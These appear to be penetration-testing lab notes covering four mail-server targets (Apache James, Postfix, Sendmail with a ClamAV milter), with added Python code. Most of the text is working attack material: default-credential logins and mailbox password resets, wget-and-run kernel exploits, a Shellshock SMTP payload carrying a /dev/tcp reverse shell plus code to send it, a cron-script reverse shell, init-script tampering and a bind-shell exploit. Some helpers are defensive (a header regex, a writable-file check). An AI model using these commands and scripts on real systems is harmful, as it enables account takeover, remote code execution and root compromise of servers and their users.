Mail 1: Apache James
Target: Linux
Foothold: Misconfiguration
- Admin CLI (James RemoteManager) on TCP 4555 accepts the default credentials root:root
nc $target 4555
Login id: root
Password: root
listusers
setpassword <user> <newpassword>
- IMAP/POP3 client: log in to each mailbox with the reset password and read the mail
- Find SSH credentials in the messages (keep a list of the accounts whose passwords were reset; those users lose access)
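To script the console check instead of typing it into nc, here is an added example (mine, not code from the original notes): a small client for the James RemoteManager that tries root:root, runs listusers and setpassword, plus a constructed fake console so demo() runs offline. The prompt and reply strings are modeled on James 2.3.2 and are an assumption; against a real box, point JamesAdmin at $target:4555.

```python
"""Probe an Apache James RemoteManager console (TCP 4555) for the default root:root
login, list accounts and reset a password. Added example, not code from the original
notes; prompts and replies are modeled on James 2.3.2 (an assumption) and
FakeRemoteManager is a constructed stand-in so demo_console() runs offline."""
import socket
import socketserver
import threading

LOGIN_PROMPT = b"Login id:"
PASSWORD_PROMPT = b"Password:"
WELCOME = b"Welcome root. HELP for a list of commands"


def _read_until(sock, marker, timeout=5.0):
    """Collect bytes until marker shows up; console prompts carry no length field."""
    sock.settimeout(timeout)
    buf = b""
    while marker not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("connection closed before %r" % marker)
        buf += chunk
    return buf


class JamesAdmin:
    def __init__(self, host, port=4555):
        self.sock = socket.create_connection((host, port), timeout=5.0)

    def login(self, user="root", password="root"):
        _read_until(self.sock, LOGIN_PROMPT)
        self.sock.sendall(user.encode() + b"\r\n")
        _read_until(self.sock, PASSWORD_PROMPT)
        self.sock.sendall(password.encode() + b"\r\n")
        reply = b""
        while not reply.strip():  # skip the bare CRLF that trails the prompt
            reply = _read_until(self.sock, b"\r\n")
        return WELCOME in reply

    def command(self, line, settle=1.0):
        """Send one command; replies have no terminator, so read until the line goes quiet."""
        self.sock.sendall(line.encode() + b"\r\n")
        self.sock.settimeout(settle)
        buf = b""
        try:
            while True:
                chunk = self.sock.recv(4096)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass
        return buf.decode(errors="replace")

    def list_users(self):
        out = self.command("listusers")
        return [l[len("user: "):].strip() for l in out.splitlines() if l.startswith("user: ")]

    def set_password(self, user, new_password):
        return "reset" in self.command("setpassword %s %s" % (user, new_password))


class FakeRemoteManager(socketserver.StreamRequestHandler):
    """Constructed console with a root:root admin and two mail users (not a real James)."""
    users = {"john": "john", "mindy": "mindy"}

    def handle(self):
        self.wfile.write(b"JAMES Remote Administration Tool 2.3.2\r\n" + LOGIN_PROMPT + b"\r\n")
        user = self.rfile.readline().strip()
        self.wfile.write(PASSWORD_PROMPT + b"\r\n")
        password = self.rfile.readline().strip()
        if (user, password) != (b"root", b"root"):
            self.wfile.write(b"Login failed for " + user + b"\r\n")
            return
        self.wfile.write(WELCOME + b"\r\n")
        for raw in self.rfile:
            parts = raw.decode(errors="replace").split() or [""]
            if parts[0] == "listusers":
                for name in self.users:
                    self.wfile.write(("user: %s\r\n" % name).encode())
            elif parts[0] == "setpassword" and len(parts) == 3 and parts[1] in self.users:
                self.users[parts[1]] = parts[2]
                self.wfile.write(("Password for %s reset\r\n" % parts[1]).encode())
            elif parts[0] == "quit":
                self.wfile.write(b"Bye\r\n")
                return


def demo_console():
    """Exercise the client against the fake console on a loopback port."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeRemoteManager)
    server.daemon_threads = True
    server.block_on_close = False
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        admin = JamesAdmin("127.0.0.1", server.server_address[1])
        ok = admin.login("root", "root")
        users = admin.list_users() if ok else []
        reset = admin.set_password(users[0], "Password1") if users else False
        admin.command("quit")
        return ok, users, reset
    finally:
        server.shutdown()
        server.server_close()
```

The console gives no prompt after a command, which is why command() reads until the socket goes quiet rather than until a marker; raise settle on a slow link.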
Privilege Escalation: Kernel exploit
- Good resource here for kernel version checks
- Target: Ubuntu 11.10, kernel 3.0.0-12-generic-pae (32-bit)
# Download Mempodipper (CVE-2012-0056, /proc/<pid>/mem write, fixed in kernel 3.2.2) to Kali; these notes keep the file name memodipper.c
# Start a python web server in that directory
# Download and compile on the target (needs gcc there; otherwise build a static 32-bit binary elsewhere and copy it over)
cd /tmp
wget http://$kaliIP/memodipper.c
gcc memodipper.c -o pwn
chmod +x pwn
./pwn
Mail 2: Postfix
Target: Linux
Foothold: Misconfiguration & Postfix Shellshock
- nmap scan shows the local domain is mail.local
- List SMB shares
smbclient -L //$target -U '' --option="client min protocol=core"
- SMB allows anonymous login
- SMB shares reveal user home directories and usernames
- Connect to the Postfix service; VRFY is enabled, so usernames can be confirmed one at a time
nc $target 25
VRFY admin@mail.local
- Receive confirmation of user existence (Postfix answers 252 for a valid address, 550 for an unknown one)
- Check searchsploit for Postfix version
searchsploit postfix
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote C | linux/remote/34896.py
- Google search for Postfix shellshock
wget https://raw.githubusercontent.com/3mrgnc3/pentest_old/master/postfix-shellshock-nc.py
- Start listener
sudo nc -lnvp $tcpPort
- Run the exploit (it places the Shellshock string in the mail headers, which a delivery agent on the target exports into the environment of a bash it spawns)
python2 postfix-shellshock-nc.py $target admin@mail.local $kaliIP $tcpPort
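What the linked script actually sends is worth seeing once. The following is an added example (mine, not the notes' or the linked exploit's code): it builds the SMTP transaction with the `() { :;}; ...` string in the usual headers, pulls the DATA section back out as the MTA would hand it to a delivery agent, and runs the detection check a milter or log review would apply. The header list and payload shape are assumptions modeled on the public Postfix Shellshock exploits; send_transaction() talks to a live server and is not run here.

```python
import re
import socket

# Detection signature for a bash exported-function definition (CVE-2014-6271)
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Headers the public Postfix Shellshock exploits load with the payload, because the
# delivery agent may export any of them into bash's environment (assumed list)
PAYLOAD_HEADERS = ["To", "From", "Reply-To", "Subject", "X-Mailer", "Message-ID", "Date"]


def shellshock_payload(lhost, lport):
    """Function-definition prefix followed by the command bash runs while importing it."""
    return "() { :;}; /bin/bash -i >& /dev/tcp/%s/%d 0>&1" % (lhost, int(lport))


def build_transaction(helo_name, sender, recipient, payload):
    """Client side of the SMTP dialogue, one list element per line sent."""
    lines = ["HELO " + helo_name, "MAIL FROM: <%s>" % sender,
             "RCPT TO: <%s>" % recipient, "DATA"]
    lines += ["%s: %s" % (name, payload) for name in PAYLOAD_HEADERS]
    lines += ["", "shellshock", ".", "QUIT"]
    return lines


def message_from_transaction(lines):
    """The DATA section, i.e. what the MTA hands to the local delivery agent."""
    start = lines.index("DATA") + 1
    end = lines.index(".", start)
    return "\r\n".join(lines[start:end]) + "\r\n"


def shellshock_headers(raw_message):
    """Names of headers whose value carries a function definition; [] for clean mail."""
    header_block = raw_message.split("\r\n\r\n", 1)[0]
    hits = []
    for line in header_block.split("\r\n"):
        if ":" not in line or line[:1] in (" ", "\t"):
            continue  # folded continuation lines belong to the previous header
        name, value = line.split(":", 1)
        if SHELLSHOCK_RE.search(value):
            hits.append(name)
    return hits


def send_transaction(host, lines, port=25, timeout=10.0):
    """Deliver the dialogue to a live server and return its replies (not exercised offline)."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        replies.append(sock.recv(1024).decode(errors="replace"))  # banner
        in_data = False
        for line in lines:
            sock.sendall(line.encode() + b"\r\n")
            if line == "DATA":
                in_data = True
                replies.append(sock.recv(1024).decode(errors="replace"))  # 354
            elif in_data:
                in_data = line != "."  # message lines get no reply until the final dot
                if not in_data:
                    replies.append(sock.recv(1024).decode(errors="replace"))
            else:
                replies.append(sock.recv(1024).decode(errors="replace"))
    return replies
```

The same regex over header values is the cheapest mail-side check for this attack; a hit in any header, not only Subject, is the signal, because the exploit does not know which header the delivery agent will export.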
Privilege Escalation: Cron job running as root
- Overwrite the script that root's cron job executes (my-script.sh in these notes) with a reverse shell; printf with %s keeps $kaliIP and $tcpPort expanding, single quotes would not
printf '#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1\n' "$kaliIP" "$tcpPort" > my-script.sh
- Start a listener
- Wait for cron to trigger the script
Mail 3: Apache James
Target: Linux
Foothold: RCE
- The running Apache James version (2.3.2) has a public RCE exploit:
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
- Copy the exploit
- Change the payload to a reverse shell
- Set the user and password to root:root
- Run
python2 35513.py $target
- Start msfconsole and use exploit/multi/handler
set lhost <kali ip>
set lport <tcp port>
run
- The exploit drops the payload into /etc/bash_completion.d, so it only fires the next time someone logs in: keep the handler up and wait
Privilege Escalation: File permissions
- /etc/init.d/james is world-writable: modify the start-up script to launch a new reverse shell
- I am able to run sudo reboot
- Start listener
- Catch the new shell when the james service starts at boot
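Both the Mail 2 cron-job and the Mail 3 init-script escalations come down to one thing: a script that root runs on a schedule or at boot, sitting in a location an unprivileged user can write. The following check is an added example (mine, not from the original notes) that walks the usual locations and reports files and directories whose mode bits let others alter them; the default path list is a constructed assumption, and demo_tempdir() builds a throwaway directory with a bad and a good script so it runs anywhere.

```python
import os
import stat
import tempfile

# Constructed default list: scripts here run as root from boot or cron, so a
# write bit for other users turns directly into a root shell
DEFAULT_ROOTS = ["/etc/init.d", "/etc/crontab", "/etc/cron.d", "/etc/cron.hourly",
                 "/etc/cron.daily", "/etc/cron.weekly", "/etc/cron.monthly"]


def _iter_paths(root):
    """Root itself plus every directory and file below it (symlinked dirs not followed)."""
    if not os.path.isdir(root):
        yield root
        return
    for dirpath, _dirnames, filenames in os.walk(root):
        yield dirpath
        for name in filenames:
            yield os.path.join(dirpath, name)


def writable_findings(roots=DEFAULT_ROOTS):
    """(path, reason, octal mode) for entries an unprivileged user could alter."""
    findings = []
    for root in roots:
        if not os.path.lexists(root):
            continue
        for path in _iter_paths(root):
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own bits mean nothing; its target is judged where it lives
            perm = stat.S_IMODE(st.st_mode)
            if stat.S_ISDIR(st.st_mode):
                # without the sticky bit anyone can unlink and replace the scripts inside
                if perm & stat.S_IWOTH and not perm & stat.S_ISVTX:
                    findings.append((path, "world-writable directory, entries can be replaced", oct(perm)))
            elif perm & stat.S_IWOTH:
                findings.append((path, "world-writable file", oct(perm)))
            elif perm & stat.S_IWGRP and st.st_gid != 0:
                findings.append((path, "writable by group gid %d" % st.st_gid, oct(perm)))
    return sorted(findings)


def demo_tempdir():
    """Constructed scenario: a world-writable init script next to a sane one."""
    root = tempfile.mkdtemp()
    os.chmod(root, 0o755)
    for name, mode in (("james", 0o777), ("ssh", 0o755)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return [(os.path.basename(p), reason, perm) for p, reason, perm in writable_findings([root])]
```

On a box without Python the one-liner equivalent for the file case is `find /etc/init.d /etc/cron* -perm -o+w`; the script adds the group-writable and replaceable-directory cases that the one-liner misses.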
Mail 4: Sendmail + ClamAV Milter
Target: Linux
Foothold: RCE
- Initial TCP port scan showed Sendmail and SNMP
- UDP port scan revealed the SNMP port (161/udp)
- Ran all SNMP Nmap scripts against the UDP port
- Found interesting process: ClamAV acting as a Sendmail milter
- Searchsploit for ClamAV, narrowed down to the Sendmail milter entry
- Exploit DB ID: 4761.pl
- The exploit (CVE-2007-4560: clamav-milter in black hole mode passes the recipient address to a shell) opens a bind shell on 31337 on the target
- Run the exploit
perl 4761.pl $target
- Connect to the bind shell
nc -nv $target 31337